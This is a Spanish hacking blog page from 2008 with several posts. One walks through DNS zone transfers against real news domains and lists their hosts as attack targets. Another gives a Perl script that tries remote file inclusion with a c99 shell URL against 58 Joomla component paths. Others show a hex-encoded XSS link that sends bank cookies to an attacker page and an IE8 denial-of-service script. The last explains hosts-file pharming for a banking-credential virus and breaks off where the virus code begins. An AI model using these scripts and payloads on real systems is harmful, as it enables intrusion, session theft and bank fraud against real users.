Interrogaciones DNS

April 14, 2008 a las 8:00 am · En las categorías DNS

Este texto tratará sobre las famosas consultas Dns, transferencias de zona, obtención de información útil para futuros objetivos.
No me gustaría orientarlo a la utilización de herramientas, me gustaría que comprediérais el funcionamiento de las herramientas. Son muchas las personas que no le dan importancia a las Dns, dejando escapar así muchísima
información que seguro que les serviría para el ataque ( si este fuese el objetivo ) e incluso al descubrimiento de nuevas máquinas más interesantes de explorar.
Antes que nada me gustaría presentaros las herramientas que debemos obtener para tener una sala de interrogatorio DNS en nuestra máquina.

NSLOOKUP: Herramienta incorporada en Windows que nos permitirá realizar una consulta de Dns inverso. Pero su función básica es traducir nombres a números de IP y viceversa.
DIG: Herramienta incorporada en Linux, existe un paquete para windows. Ya que tanto usuarios de Windows y Linux podamos realizar la práctica de más adelante. Nos permitirá realizar consultas a un servidor Dns.
Whois: Utilidad que la usaremos para obtener los servidores Dns, tanto primario como secundario de un dominio.

Empezemos bien un poco el funcionamiento de Nslookup, como digimos la opción básica de Nslookup es resolver nombre a Ip’s y vicerversa. Veamos un ejemplo:

Listado 1:
C:\Documents and Settings\Jose>nslookup www.as.com
Servidor: 250.Red-80-58-61.staticIP.rima-tde.net
Address: 80.58.61.250
Respuesta no autoritativa:
Nombre: a579.g.akamai.net
Addresses: 194.224.66.97, 194.224.66.73, 194.224.66.105, 194.224.66.81
194.224.66.107
Aliases: www.as.com, as.com.edgesuite.net
Fin listado 1:

Vamos a mirar linea por linea, comprediendo cada y una de las cosas.
Utilizamos Nslookup incorporado en windows y realizamos una simple petición básica a www.as.com .
Las dos primeras lineas de nuestra consulta, son información nuestra, asi que no le haremos caso.
Como vemos en la primera respuesta:

Nombre: a579.g.akamai.net

Es el verdadero nombre y por tanto www.as.com, es un alias. Esto lo veremos mucho mejor más adelante con la utilización de la herramienta Dig.

Addresses: 194.224.66.97, 194.224.66.73, 194.224.66.105, 194.224.66.81
194.224.66.107

Son las direcciones Ip’s que contiene el nombre.

Aliases: www.as.com, as.com.edgesuite.net

Como tal lo dice hay , son alias de a579.g.akamai.net.
Aquí hemos terminado nuestra consulta básica de Nslookup, ahora veremos una algo más compleja.
Antes de seguir, para las siguientes prácticas debemos conseguir el servidor primario del dominio que intentemos obtener información:

whois.sc/dominio
whois.sc/as.com

Como resultado el resultado:

Domain servers in listed order:
DNS1.IBERCOM.COM
DNS2.IBERCOM.COM

Seguimos utilizando Nslookup:

Listado 2:
C:\Documents and Settings\Jose>nslookup
Servidor predeterminado: 250.Red-80-58-61.staticIP.rima-tde.net
Address: 80.58.61.250
> server DNS1.IBERCOM.COM
Servidor predeterminado: DNS1.IBERCOM.COM
Address: 213.195.64.129
> set type=any
> ls as.com
[DNS1.IBERCOM.COM]
as.com. NS server = dns1.ibercom.com
as.com. NS server = dns2.ibercom.com
as.com. A 212.80.177.186
chat A 194.169.201.197
foromundial A 83.230.157.6
foros A 83.230.157.1
indice A 83.230.157.115
juegos A 85.158.168.16
juegosjava A 212.80.177.167
pda A 212.80.177.186
tienda A 62.97.112.36
tienda A 62.97.112.37
www.tienda A 212.51.53.178
www-org A 212.80.177.186
Fin listado 2:

Vamos a ir mirando cada cosa y a comprenderla.
La dos primeras lineas las dejamos porque ya dije que es información nuestra y no nos interesa.
Bueno antes que nada, los comandos que tuvimos que insertar fueron:

1- nslookup
2- server “nombre del servidor DNS o IP” (sin comillas)
3- set type=any
4- ls as.com

Aclaramos los comandos. El primero llamamos a la herramienta, en el segundo especificamos el servidor Dns a consultar, en el 3 colocamos la opción any, para que nos muestre todos los resultados, y por última el 4 comando para especificar con que dominio queremos preguntar.
Miramos a partir del “ls as.com”. Podemos observar que acabamos de realizar una transferencia de zona, hemos conseguido por medio de consultas a la Dns que nos diga Ip’s que guarda el servidor primario de la Dns y que se supone que no debe de revelar la lista a nadie.

Vallamos poco a poco.

as.com. NS server = dns1.ibercom.com
as.com. NS server = dns2.ibercom.com
as.com. A 212.80.177.186
NS – ser refiere a los servidores Dns, hay nos dice los servidores Dns que usa as.com. En la última linea indica “A” esto nos indica la Ip que aloja el dominio. Para los españoles si colocas la Ip en el navegador nos conducirá a la web de elpais.net , esto quiere decir que ambas webs se alojan en el mimas máquina.
Sigamos mirando más.
chat A 194.169.201.197
foromundial A 83.230.157.6
foros A 83.230.157.1
indice A 83.230.157.115
juegos A 85.158.168.16
juegosjava A 212.80.177.167
pda A 212.80.177.186
tienda A 62.97.112.36
tienda A 62.97.112.37
www.tienda A 212.51.53.178
www-org A 212.80.177.186

Estos son datos que no debería dejar vernos la Dns, e aquí la muestra de su mala configuración.
Algunas de estas direcciones nos pueden tentar a explorar, por ejemplo mirar esa de:

www.tienda A 212.51.53.178

Tenemos la ip donde se aloja, tal como indica “A”. Alomejor en esa máquina encontramos cosas que nos puedan interesar, ¿Porqué no probar suerte y buscar un Bug?. Pero bueno en ese tema no nos meteremos, seguiremos con nuestras consultas y descubriendo más cosas.
Como vimos antes, as.com se aloja en la misma máquina que elpais.net. Hagamosle un “lselpais.net”.

Listado 3:
> ls elpais.es
[DNS1.IBERCOM.COM]
elpais.es. NS server = dns1.ibercom.com
elpais.es. NS server = dns2.ibercom.com
elpais.es. A 212.80.177.133
24horas A 212.80.177.171
babelia A 212.80.177.133
bandaancha A 212.80.177.233
buscador A 212.80.177.207
chat A 194.169.201.197
ciberpais A 212.80.177.133
clasificados A 212.166.72.38
www.conectate A 212.166.72.38
demuestratutalento A 212.80.177.133
domingo A 212.80.177.133
elpais A 212.80.177.133
curso.emagister A 194.116.240.140
curso-gratis.emagister A 194.116.240.140
masters.emagister A 194.116.240.140
tutorial.emagister A 194.116.240.140
escuela A 212.80.177.133
estudiantes NS server = dns1.ibercom.com
estudiantes NS server = dns2.ibercom.com
foromundial A 83.230.157.6
foros A 194.169.201.150
fotoverano A 212.80.177.133
www.fotoverano A 212.80.177.133
graficos A 212.80.177.194
indice A 83.230.157.113
juegos A 85.158.168.16
mipais A 212.80.177.198
mipais2 A 212.80.177.198
negocios A 212.80.177.133
pda A 212.80.177.133
pda-org A 212.80.177.133
pdf A 212.80.177.133
pocketpc A 212.80.177.133
psp A 212.80.177.133
software A 194.116.241.57
static A 212.80.177.232
tentaciones A 212.80.177.133
www.tentaciones A 212.80.177.133
test A 212.80.177.198
test-es A 212.80.177.133
texto A 212.80.177.133
tienda A 62.97.112.36
tienda A 62.97.112.37
titulares A 212.80.177.133
viajero A 212.80.177.133
wap A 212.80.177.133
www-org A 212.80.177.133
Fin listado 3:

Yo no quiero tentar a nadie pero:

negocios A 212.80.177.133

Hemos recaudado varios que pueden ser objetivos de futurus ataques.
Bueno amigos aquí terminamos nuestra parte con Nslookup. Hemos aprendido a realizar consultas al servidor primario (Dns) y nos ha devuelto información y lo más importante, Ip’s que supuestamente son confidenciales.
Despues de este 1º paso del ataque ( recaudación de información ), sería escoger una de las Ip’s de la transferencia de Zona que nos llamara la antención y ponerle a prueba con algún scanner de Bugs, y traceroute para comprobar si tiene algún firewall, router … que nos impidiera la entrada.

Apuntes:
MX para los servidores de correo
A para la ip del servidor que aloja al dominio
ANY reune las anteriores
AAAA nos indica el numero IP en ipv6 (si es que lo tiene, claro):
Fin apuntes:
Ahora vamos a utilizar Dig.

Listado 4:
C:\Documents and Settings\Jose\Escritorio\dig-files>dig in a www.as.com
NS1.IBERCOM.COM
; <<>> DiG 9.3.2 <<>> in a www.as.com @DNS1.IBERCOM.COM
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1325
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 9, ADDITIONAL: 3
;; QUESTION SECTION:
;www.as.com. IN A
;; ANSWER SECTION:
www.as.com. 86400 IN CNAME as.com.edgesuite.net.
as.com.edgesuite.net. 12051 IN CNAME a579.g.akamai.net.
a579.g.akamai.net. 12 IN A 213.195.75.135
a579.g.akamai.net. 12 IN A 213.195.75.136
;; AUTHORITY SECTION:
g.akamai.net. 1062 IN NS n7g.akamai.net.
g.akamai.net. 1062 IN NS n8g.akamai.net.
g.akamai.net. 1062 IN NS n0g.akamai.net.
g.akamai.net. 1062 IN NS n1g.akamai.net.
g.akamai.net. 1062 IN NS n2g.akamai.net.
g.akamai.net. 1062 IN NS n3g.akamai.net.
g.akamai.net. 1062 IN NS n4g.akamai.net.
g.akamai.net. 1062 IN NS n5g.akamai.net.
g.akamai.net. 1062 IN NS n6g.akamai.net.
;; ADDITIONAL SECTION:
n0g.akamai.net. 1718 IN A 84.53.135.143
n2g.akamai.net. 3517 IN A 80.231.69.38
n3g.akamai.net. 1717 IN A 213.195.75.130
;; Query time: 140 msec
;; SERVER: 213.195.64.129#53(213.195.64.129)
;; WHEN: Sat Jun 02 13:53:35 2007
;; MSG SIZE rcvd: 332
Fin listado 4:

El texto precedido de “;” son comentarios de Dig, asi que no nos interesa.
;; QUESTION SECTION:
;www.as.com. IN A
Nos detalla el dominio consulta. Nos informa que estamos consultando en los registros A.
IN indica que la búsqueda se realiza en el ámbito de internet.
;; ANSWER SECTION:
www.as.com. 86400 IN CNAME as.com.edgesuite.net.
as.com.edgesuite.net. 12051 IN CNAME a579.g.akamai.net.
a579.g.akamai.net 12 IN A 213.195.75.135
a579.g.akamai.net. 12 IN A 213.195.75.136
“Cname” quiere decir que www.as.com. Es un alias de as.com.edgesuite.net. Y en la segunda linea
nos indica que as.com.edgesuite.net es un alias de a579.g.akamai.net y ya en las última dos lineas
nos muestra la Ip de a579.g.akamai.net , que debería ser la Ip importante, es decir el servidor
principal.

;; AUTHORITY SECTION:
g.akamai.net. 1062 IN NS n7g.akamai.net.
g.akamai.net. 1062 IN NS n8g.akamai.net.
g.akamai.net. 1062 IN NS n0g.akamai.net.
g.akamai.net. 1062 IN NS n1g.akamai.net.
g.akamai.net. 1062 IN NS n2g.akamai.net.
g.akamai.net. 1062 IN NS n3g.akamai.net.
g.akamai.net. 1062 IN NS n4g.akamai.net.
g.akamai.net. 1062 IN NS n5g.akamai.net.
g.akamai.net. 1062 IN NS n6g.akamai.net.

Aquí podemos ver todos los servidores Dns, tal y como apunta “NS” del servidor principal
( a579.g.akamai.net ), que a su vez este poseía alias como www.as.com. Y as.com.edgesuite.net,
como también vimos en la primera consulta básica con Nslookup (para recordar un poco).
Y ya finalmente:

;; ADDITIONAL SECTION:
n0g.akamai.net. 1718 IN A 84.53.135.143
n2g.akamai.net. 3517 IN A 80.231.69.38
n3g.akamai.net. 1717 IN A 213.195.75.130

Nos muestra la Ip de los servidores Dns mostrados en “AUTHORITY SECTION”.
Aquí terminado todo lo que queria mostrar en este manual y veros ver lo importante que puede ser un servidor DNS mal configurado para un atacante.

Referencias:
http://www.demon.net/external/
http://www.arin.net/whois/
http://gday.bloke.com/cgi-bin/nslookup
http://www.nic.cl/cursoDNS/ponencias/herramientas/1.html
http://www.ignside.net/man/redes/dig.php

Autor: Jose Luis Góngora Fernández (JosS)

Comentarios (4)

Simples automatizaciones de Vulnerabilidades en CMS’s

April 1, 2008 a las 5:03 pm · En las categorías Hacking, Perl

Hola, más de uno habrá escuchado o visto algo de las “automatizaciones de vulnerabilidades“. Estas tools son denominadas script’s por su simple programación. Aunque tenemos dos tipos: aquellas automatizaciones que se encargan de explotar las vulnerabilidades (las cuales se acercan más al termino de exploits), o aquellas que escanean en busca de unos determinados parámetros vulnerables. (En esta última centraremos la entrada de hoy).

Como estamos acostumbrados a decir, un hacker es una persona inteligente que es capaz crear seres más rápidos que él. Imaginemos que tenemos un CMS en el cual existen varias vulnerabilidades, no creo que la mejor manera fuese ir probando vulnerabilidad a vulnerabilidad a mano. Aquí es cuando la astucia del hacker se pone en marcha. Y ¿Porqué no crear un ser que lo haga por mi?. Claro una automatización que compruebe las vulnerabilidades de ese CMS automáticamente, mientras yo puedo hacer otras cosas.

Las automatizaciones que buscan parámetros vulnerables son simples de programación y aún más para vulnerabilidades en Web Apps. Veamos el ejemplo de una automatización para las vulnerabilidades de Remote File Inclusion en el CMS de Joomla.

#!/usr/bin/perl# RFI Joomla Comp v.1
# Code by JosS
# http://www.fullsecure.org

use HTTP::Request;
use LWP::UserAgent;sub lw
{
my $SO = $^O;
my $linux = “”;
if (index(lc($SO),”win”)!=-1){
$linux=”0″;
}else{
$linux=”1″;
}
if($linux){
system(”clear”);
}
else{
system(”cls”);
system (”title RFI Joomla Comp v.1 - By JosS”);
system (”color 02″);
}
}
&lw;

print “\t\t########################################################\n\n”;
print “\t\t# RFI Joomla Comp .v1 - EspSec #\n\n”;
print “\t\t# by Jose #\n\n”;
print “\t\t########################################################\n\n”;

print “Insert host:(ex: http://www.site.com/)\n”;
$host=;
chomp $host;
print “\n”;

# Si la url no tiene http: al principio
if ( $host !~ /^http:/ ) {

# lo añadimos
$host = ‘http://’ . $host;
}
# Si la url no tiene / al final
if ( $host !~ /\/$/ ) {

# lo añadimos
$host = $host . ‘/’;
}
print “Insert shell:(ex: http://www.site.com/c99.txt)\n”;
$shell=;
chomp $shell;
print “\n”;

# Si la url no tiene http: al principio
if ( $shell !~ /^http:/ ) {

# lo añadimos
$shell = ‘http://’ . $shell;
}
print “Insert string search:(ex: c99shell)\n”;
$string=;
chomp $string;
print “\n\n”;

print “Your config:\n\n”;
print ” Victim: $host \n”;
print ” Url Shell: $shell \n”;
print ” Search String: $string \n\n”;
print “Scan…\n\n”;

$vuln1=”administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=”;
$vuln2=”components/com_lmo/lmo.php?mosConfig_absolute_path=”;
$vuln3=”components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=”;
$vuln4=”administrator/components/com_webring/admin.webring.docs.php?component_dir=”;
$vuln5=”administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=”;
$vuln6=”components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=”;
$vuln7=”components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=”;
$vuln8=”administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=”;
$vuln9=”administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=”;
$vuln10=”components/com_reporter/reporter.logic.php?mosConfig_absolute_path=”;
$vuln11=”administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?

mosConfig_absolute_path=”;
$vuln12=”components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=”;
$vuln13=”components/com_joomlaboard/file_upload.php?sbp=”;
$vuln14=”components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=”;
$vuln15=”components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=”;
$vuln16=”components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=”;
$vuln17=”components/com_thopper/inc/request_type.php?mosConfig_absolute_path=”;
$vuln18=”components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=”;
$vuln19=”components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=”;
$vuln20=”components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=”;
$vuln21=”components/com_mosmedia/media.tab.php?mosConfig_absolute_path=”;
$vuln22=”components/com_mosmedia/media.divs.php?mosConfig_absolute_path=”;
$vuln23=”modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=”;
$vuln24=”modules/mod_as_category.php?mosConfig_absolute_path=”;
$vuln25=”components/com_articles.php?absolute_path=”;
$vuln26=”classes/html/com_articles.php?absolute_path=”;
$vuln28=”administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=”;
$vuln29=”templates/be2004-2/index.php?mosConfig_absolute_path=”;
$vuln30=”libraries/pcl/pcltar.php?g_pcltar_lib_dir=”;
$vuln31=”administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=”;
$vuln32=”administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=”;
$vuln33=”administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=”;
$vuln34=”components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=”;
$vuln35=”administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=”;
$vuln36=”administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=”
$vuln37=”administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=”;
$vuln38=”administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=”;
$vuln39=”administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=”;
$vuln40=”administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=”;
$vuln41=”administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=”;
$vuln42=”administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=”;
$vuln43=”administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=”;
$vuln44=”components/com_mp3_allopass/allopass.php?mosConfig_live_site=”;
$vuln45=”components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=”;
$vuln46=”administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=”;
$vuln47=”administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=”;
$vuln48=”administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=”;
$vuln49=”administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=”;
$vuln50=”administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=”;
$vuln51=”administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=”;
$vuln52=”administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=”;
$vuln53=”administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?

mosConfig_absolute_path=”;
$vuln54=”administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?

mosConfig_absolute_path=”;
$vuln55=”administrator/components/com_color/admin.color.php?mosConfig_live_site=”;
$vuln56=”administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=”;
$vuln57=”administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=”;
$vuln58=”modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=”;

for ($i=1;$i<59;$i++)
{
$cont=vuln.$i;
chomp $cont;
print “$cont\n”;

$final=$host.$$cont.”$shell?”;
my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /$string/){
open(FILE,”>>results.txt”);
print FILE “$final\n”;
close(FILE);

print “————————————————-\n”;
print “$final\n”;
print “IS VULNZ..\n”;
print “————————————————-\n”;
}}

}

Nunca me cansaré de decirlo: Aún queda mucho por aprender y enseñar.

Comentarios

Técnicas Anti-Pishing:

March 31, 2008 a las 8:57 am · En las categorías Fraude

¿Que es el Pishing?
Según la wikipedia, el Pishing es lo siguiente:
“Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas.”
Básicamente, el Pishing consiste en substraer datos confidenciales (contraseñas, datos bancarios…) mediante la imitación de una pagina de seguridad (la del mismo banco).

¿Como evitar el Pishing?
Es fundamental fijarse en los links de las paginas del banco, ya que muchas veces pueden no ser exactamente como tienen que ser, por ejemplo, supongamos que tenemos lo siguiente:

<script language=”JavaScript”>
function Redireccion() {
var pass = prompt(” Introduce la password:”, “”)
if(pass == null)
{
alert(”Debes especificar tu password para poder entrar.”)
if (confirm(”¿Quieres intentarlo de nuevo?”))
{
Redireccion()
}
}
window.open(”http://www.tubanco.com/usuarios.php?pass=” +
pass)
}
</script>

Este seria el supuesto javascript correcto, pues, para hacer un pishing a este código, sencillamente tendríamos que cambiar esta linea:

window.open(”http://www.tubanco.com/usuarios.php?pass=” +
pass)

por una pagina nuestra que recopilará las passwords introducidas. Muchos Pishers intentan aprovecharse de esto creando subdominios muy parecidos al que intentan Pishear, en este caso, serian del orden de:

– http://www.tubanco.hostinggratuito.com
– http: //www.tubanco@hostinggratuito.com

Si el usuario se fija en que las url’s de los links son correctas no hay posibilidad de Pishing de este tipo.

Phishing Avanzado
Las técnicas Phising mas avanzadas utilizan mezclas de html + javascript para confundir al usuario, ya que con javascript pueden pegar una foto sobre la dirección real y simular se una dirección tipo www.tubanco.com.
Otras opciones es buscar vulnerabilidades tipo Xss en la web del banco, que conlleva la ejecución de código javascript dentro de la web del banco. Un ejemplo seria el siguiente:

http://www.tubanco.com/accesosvulnerable.php?pass=”>

Una vez con la cookie, si la victima ya estaba logueada, el atacante se puede entrar en la cuenta de la victima sin necesitad de introducir ninguna contraseña. Cabe decir, que el link del robo de cookies se podría detectar muy fácilmente por el
usuario, para esconder esa información, el atacante puede codificar esa cadena del javascript en hexadecimal, quedando así:

http://www.tubanco.com/accesosvulnerable.php?pass=%22%3e%3
c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74
%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3
a%2f%2f%77%77%77%2e%70%61%67%69%6e%61%64%65%6c%
61%74%61%63%61%6e%74%65%2e%63%6f%6d%2f%72%65%67
%69%73%74%72%6f%64%65%63%6f%6f%6b%69%65%73%2e%7
0%68%70%3f%63%6f%6f%6b%69%65%3d%27%20%20%20%64%
6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%
73%63%72%69%70%74%3e

Una vez asi es imposible advertir que detrás de esos caracteres en hexadecimal se encuentra una instrucción para robarnos la cookie. Es conveniente, que si se encuentran una url de estas características, lo descodifiquen, para ver si en realidad debemos o no entrar en ese link.
Actualmente, muchos bancos han implementado la seguridad https en sus pagina, lo que garantiza que la información, antes de ser transferida, será codificada, asegurándonos así que si un atacante lograra interceptar nuestros datos, los tendría que descodificar.

Comentarios

Denegación de servicos en IExplorer 8

March 31, 2008 a las 8:02 am · En las categorías Seguridad, Windows

Asi es, investigando sobre la meteria de este tipo de ataques DoS, nos llevo a hacía una herramienta de microsoft, el nuevo internet explorer 8, que si fuera poco despues de su mala entrada que ha causado entre los diseñadores y sus hojas de estilo, tambien viene dando guerra en el ámbito de la seguridad. Se trata de un secuestro de prototipos sobre el objeto de XDomainRequest, el encargado de llamar de las llamadas XML entre dominios.

Para explotar este ataque por ejemplo vamos abrir ventanas sobre PerformSec, lo que causamos es abrir una nueva ventana de ejecución en cuanto la ventana anterior se cuelga, esto nos lleva a quedarnos son recursos y tener que reiniciar el sistema para volver a la normalidad, ya que la ejecución de ventanas es infinita, esto es un suceso muy parecido cuando programamos sobre lenguaje JavaScript bluces infinitos, el escript para explotar esta vulnerabilidad es el siguiente:

<script>
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = ‘PerformSec’;
xdr = new XDomainRequest();
xdr.open(”POST”, “http://performsec.com”);
xdr.send(ping);
</script>

Comentarios

Agujero de seguridad en vista, y Microsoft hace trampas

March 28, 2008 a las 6:55 pm · En las categorías Seguridad, Windows

No es ningún secreto que Microsoft, la empresa que desarrolla Windows, es muy amiga del juego sucio, las trampas, las mentiras, y el engaño, ha llegado a tal punto, que la empresa recibe multas por sus prácticas, que rozan lo criminal y que están muy lejos de la ética y la competencia libre.

Sin embargo, todo esto parece algo lejano hasta que lo vives en tus propias carnes, el como una empresa como esta, con su poder, extiende su brazo para tapar lo que les interesa… y creedme, es frustrante.

La historia comienza cuando hace un par de semanas, tuve que instalarme Windows Vista para pasar una aplicación en python a windows (había algunas ligeras diferencias entre el código para windows y el de linux, y yo me encargaba de corregirlas), entre programar y programar, me pongo a echarle un vistazo al vista, me estudio un poco como van sus capas de seguridad, el UAC, todo esto nuevo de lo que Microsft habla tanto.

Al cabo de un rato de estudiarmelo, leo en meneame un noticia un tanto curiosa que habla sobre un programa que viene incluido en vista, y que permite realizar tests sobre la potencia del hardware de tu sistema (benchmarking), el caso es que me pongo a jugar con ella, cuando veo que la noticia habla sobre un comando, así:

winsat d3d -texshader -totalobj 15

lo cual crea un efecto 3d para testear tu gráfica, con tantas figuras como especifiques tras el -totalobj.

Nada mas ver el argumento, me imaginé que el programador habría utilizado un signed int (un entero que usa el bit mas significativo para la parte negativa, por lo que su tamaño es de la mitad que 2^32) para almacenar el parametro -totalobj, por lo que si pedimos un número suficientemente largo, sobrepasamos la mitad positiva del número y pasamos a la negativa, o incluso, si pasamos 2^32+1 el número valdrá 0. Todo esto está ya mas que estudiado en seguridad y se llama Integer Overflow.

Así que hice la prueba:

winsat d3d -texshader -totalobj 2147483648

Esto dejaría al signed int en negativo, y si alguien hace la prueba verá que con eso, winsat.exe se detiene y peta (lo que en linux sería una violación de segmento).

Llegados a este punto, ya sabemos con total certeza, que existe un agujero de seguridad en esa aplicación, además, la guinda del pastel viene en que esa aplicación pide privilegios de administrador para ejecutarse, por lo que si esto llegase a ser explotable, y pudiésemos ejecutar código a partir de esta aplicación, podríamos utilizar esto para elevar privilegios desde nuestra aplicación, ya que si nuestra aplicación pide privilegios de administrador, lo mas probable es que cuando el user lea que una aplicación pide privilegios, diga que no (un user educado), sin embargo, si nuestra aplicación ejecuta a winsat.exe y de ahí, ejecuta código, es winsat.exe, firmado por Microsoft y alojado en system32, quien pide los privilegios, esto cambia mucho el asunto.

Dejando a un lado hasta donde llega esta vulnerabilidad, decidí contactar con Microsoft para que la solucionasen, primero me contestaron con muy buenas palabras, hasta que llega un mail un poco mas raro:

Hello Jose,Thank you for your report. To follow up I am wondering what about this crash indicates to you that it is exploitable. Have you been able to obtain an elevation of privilege, code execution, etc.?

Thank you,

Nate

Me pedían a mi, que les explicase como explotarlo, es decir, ellos no sabían muy bien por donde cogerlo.

Tras un par de correos mas, Microsoft deja de dar señales de vida, y me decido a enviar el agujero de seguridad, a la principal lista de correo de seguridad informática: securityfocus bugtraq, donde misteriosamente, ya casi no se reciben bugs de productos Microsoft, comparado con hace un año.

Al poco rato de enviar el siguiente texto:

From: jose@eyeos.org
To: bugtraq@securityfocus.com
Date: 28 Mar 2008 19:10:39 -0000
Subject: Microsoft Windows Vista winsat.exe Integer Overflow
Title: Windows Vista winsat.exe Integer OverflowDiscovered by: Jose Carlos Norte (jose@eyeos.org)

Vendor Status: notified on 24-03-08, MSRC start to work on a solution, but give no answer in 4 days.

There is a flaw in windows vista benchmarking tool, called winsat.exe, that runs withs administrative privileges.

The problem, is an integer overflow in -totalobj argument, example:

winsat d3d -texshader -totalobj 2147483648

this result in a overflow of the signed int that stores the totalobj argument, and turns it negative, and then, the program crashes.

I’m not sure if you can control some memory using other options in winsat.exe arguments to take advantage of this issue, and exploit it.

Me contesta un moderador de la lista, diciendome que NO ACEPTAN mi correo, argumentando lo siguiente:

WinSAT requires administrator privileges to run. If the user does not
have administrator privileges, WinSAT will display a dialog box that
asks for credentials

Evidentemente, se olvidan de mencionar que la gran ventaja maravillosa de Windows Vista es que ya no corren las cosas como administrador, por defecto, sin embargo, este tipo de bugs, revive viejos problemas en Windows, pero eso no importa.

Lo mas irónico de la historia es que hace algún tiempo en estas listas de seguridad solo se ven bugs en productos de software libre o productos de terceros, pero cada vez menos, en productos Microsoft.

Además, el mismo moderador aceptó como bugs válidos, este bug, quees totalmente FUD, que lo que insinua es que si puedes acceder a la memoria del proceso xchat, estando en local y con acceso al sistema, puedes pillar datos sensible de tu propio usuario, y este otro,que tal como se ve en las respuestas, directamente: es falso.

La pregunta que queda en el aire es: ¿hay un doble rasero en las listas de seguridad, es decir, hay censura según quien sea el afectado por el bug, o cuanto dinero tenga para taparlo?

Autor | Jose Carlos Norte

Comentarios (4)

Pharming, nueva técnica de fraude

March 28, 2008 a las 5:55 pm · En las categorías Fraude, Seguridad

Hoy me gustaría hablarles del pharming, principalmente de su uso y abuso.
Es una vulnerabilidad que reside en los servidores DNS, aquellos servidores que transforman URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son fines no legales, como puede ser el Phising, una de las prioridades de esta vulnerabilidad.

Más que nada quiero enfocar este texto al uso práctico de virus creados para el robo de credenciales.

#Hosts.

En todos los sistemas operativos, ya sean de particulares o empresas poseen un archivo llamado ‘hosts’ en el se encuentran las URLs y las IPs a las que se dirigen.
Si nosotros podemos escribir en ese archivo ‘hosts’ podríamos hacer que al entrar a google.com fuera a www.performsec.com. Veamos un ejemplo:

127.0.0.1 localhost

Esto quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que cuando ponemos localhost en nuestro navegador nos dirigimos a nuestra máquina.

#Rutas.

# Windows 95/98/Me: C:\Windows\Hosts
# Windows NT/2000: C:\WINNT\System32\drivers\etc
# Windows XP: C:\WINDOWS\system32\drivers\etc
# Windows 2003: C:\WINDOWS\system32\drivers\etc
# Windows Vista: C:\WINDOWS\system32\drivers\etc
# Unix (en general): /etc/hosts
# Linux (en general): /etc/hosts
# MacOS (en general): /etc/hosts

En esos directorios se encuetra un archivo llamado ‘hosts’. El cual podemos modificar a nuestro gusto.

#Code.

Si queremos crear un virus dedicado al robo de credenciales bancarias el uso de la técnica Pharming nos dará muchos resultados. Imaginemos que tenemos un Scam del ‘Banco BBVA’ en la IP = 85.235.65.99 y qeremos que la víctima que a sido infectada por el virus al entrar a la web oficial del ‘Banco BBVA’, redireccione a nuestro Scam. Para eso haríamos esto:

85.235.65.99 bbva.es

La programación del virus:

